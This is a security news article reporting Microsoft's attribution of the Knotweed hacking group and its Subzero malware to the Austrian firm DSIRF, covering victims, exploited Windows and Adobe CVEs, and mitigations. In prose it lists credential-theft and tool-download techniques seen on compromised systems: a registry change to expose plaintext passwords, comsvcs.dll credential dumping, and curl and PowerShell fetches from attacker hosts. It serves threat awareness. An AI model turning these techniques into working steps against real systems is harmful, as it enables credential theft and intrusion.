The Austrian Company DSIRF Was Linked to the Knotweed Hack Group and the Subzero Malware

DSIRF linked to Knotweed

Microsoft has been told that the Knotweed hack group is linked to the Austrian spyware vendor DSIRF, which also often acts as a cyber mercenary. Researchers have determined that Knotweed is attacking European and Central American organizations using the Subzero malware toolkit.

Let me remind you that we also wrote that Experts linked BlackCat (ALPHV) ransomware to BlackMatter and DarkSide groups, and also that Evil Corp Ransomware Posing As PayloadBin Group To Avoid US Sanctions.

On the official website, DSIRF advertises itself as a company that is engaged in analytics, cyber forensics, and intelligence related to data. However, Microsoft associates this company with the Subzero malware, which DSIRF clients can use to hack their phones, computers, network devices, and so on.

Earlier, while studying the Knotweed attacks, the information security company RiskIQ also discovered that the infrastructure serving malware since February 2020 may be associated with DSIRF, including the official website and domains of the company, which were probably used to debug and prepare Subzero for work.

Now, Microsoft Threat Intelligence Center (MSTIC) analysts are writing about multiple links between DSIRF and the malicious tools used in Knotweed attacks. In particular, we are talking about the C&C infrastructure used by malware; a DSIRF-linked GitHub account that was used in one of the attacks; a code signing certificate that was issued by DSIRF and used to sign the exploit; and other posts that linked Subzero directly to DSIRF.

Microsoft has studied some of the Knotweed attacks and discovered that they have targeted law firms, banks, and consulting organizations around the world, including Austria, the UK, and Panama.

As part of the study of this malware and Microsoft’s communication with victims of Subzero, it turned out that the victims did not order pentesting or redtiming, which confirms that this was an unauthorized and malicious activity.Microsoft experts write.

On compromised devices, the attackers deployed Corelump, the main payload that ran from memory to avoid detection, as well as Jumplump, a heavily obfuscated loader that downloaded and loaded Corelump into memory.

The main Subzero payload has many features, including keystroke interception, screen capture, data theft, as well as launching remote shells and arbitrary plugins downloaded from the control server.

On compromised systems where Knotweed deployed its malware, Microsoft has observed various consequences of the breach, including:

  1. setting UseLogonCredential to “1” to enable plain text credentials;
  2. collection of credentials through comsvcs.dll;
  3. attempting to access emails with a credential dump from a Knotweed IP address;
  4. using Curl to download Knotweed tools from file shares, including vultrobjects[.]com;
  5. running PowerShell scripts directly from GitHub and an account associated with DSIRF.

Among the 0-day vulnerabilities that Knotweed used in its campaigns, Microsoft highlights the recently fixed issue CVE-2022-22047, which helped attackers to elevate privileges, leave the sandbox and achieve system-level code execution.

In addition, last year Knotweed used an exploit chain consisting of two Windows privilege escalation vulnerabilities (CVE-2021-31199 and CVE-2021-31201) in combination with an exploit for an Adobe Reader vulnerability (CVE-2021-28550). All these bugs were fixed in June 2021.

Also in 2021, the group was associated with the exploitation of the fourth 0-day vulnerability that was privilege escalation in the Windows Update Medic Service (CVE-2021-36948). This bug was used to force the loading of an arbitrary signed DLL.

To limit these attacks, we have released an update that aims to reduce the exploitation of vulnerabilities, as well as published malware signatures that will protect Windows users from Knotweed exploits that are used to deliver malware. We are increasingly seeing how private sector offensive security companies sell their tools to authoritarian regimes that operate against the letter of the law and human rights norms and use them to attack human rights defenders, journalists, dissidents and other members of civil society.Microsoft representatives write.

By Vladimir Krasnogolovy

Vladimir is a technical specialist who loves giving qualified advices and tips on GridinSoft's products. He's available 24/7 to assist you in any question regarding internet security.

Leave a comment

Your email address will not be published. Required fields are marked *